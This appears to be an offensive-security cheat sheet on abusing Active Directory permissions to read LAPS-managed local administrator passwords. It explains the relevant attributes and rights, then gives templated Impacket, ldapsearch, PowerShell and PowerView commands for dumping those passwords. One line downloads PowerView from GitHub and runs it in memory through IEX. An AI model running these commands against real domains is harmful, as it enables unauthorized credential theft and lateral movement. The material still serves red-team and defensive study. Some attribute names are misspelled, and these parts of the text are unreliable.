PRIMARY CATEGORY → DACL ABUSE
Theory
The LAPS solution allows sysadmins to manage the local administrador password for computers joined to the domain in a simpler way
It generates complex passwords periodically for the mentioned local user accounts and stores them in an specific attribute of the domain computer account object
The password in question can be stored either in plain text or encrypted
When Legacy Microsoft LAPS is deployed on the AD environment, two attributes are added to each domain computer account
- ms-Mcs-AdmPwd
- ms-Mcs-AdmPwdExpirationTime
The former contains the password in plain text, while the other specifies the password expiration date
In the other hand, when Windows LAPS is deployed, the following attributes are set to the computer account objects
- msLAPS-Password
- msLAPS-EncryptePassword
Both attributes stores the object’s password, the first in plain text and the latter encrypted
By default, only Domain Admins can read the administrator password of any domain-joined machine
However, any account with the following rights over a domain computer account could end up reading the given password
- User or group with “Read All Properties” or “Read ms-Mcs-AdmPwd”
- GenericAll (FullControl), WriteDACL, WriteOwner, AllExtendedRights or WriteProperty
Abuse - UNIX-like
Impacket’s GetLAPSpassword.py
GetLAPSPassword.py -dc-ip '<DC_IP>' '<DOMAIN>/<USER>:<PASSWD>'LDAPsearch
ldapsearch -LLL -x -H 'ldap://<DC_FQDN>' -D '<UPN>' -w '<PASSWD>' -b 'DC=<DOMAIN>,DC=<TLD>' '(ObjectClass=Computer)' 'ms-mcs-admpwd' | grep -i -- 'ms-mcs-admpwd'Abuse - Windows
Powershell AD Module
Get-ADComputer -filter {ms-mcs-admpwdexpirationtime -like '*'} -prop 'ms-mcs-admpwd','ms-mcs-admpwdexpirationtime'Powerview
Setup
IEX (New-Object Net.WebClient).downloadString('https://github.com/PowerShellMafia/PowerSploit/raw/refs/heads/master/Recon/PowerView.ps1')Usage
Get-DomainComputer
Get-DomainComputer '<TARGET>' -Properties 'cn', 'ms-mcs-admpwd', 'ms-mcs-admpwdexpirationtime' | fl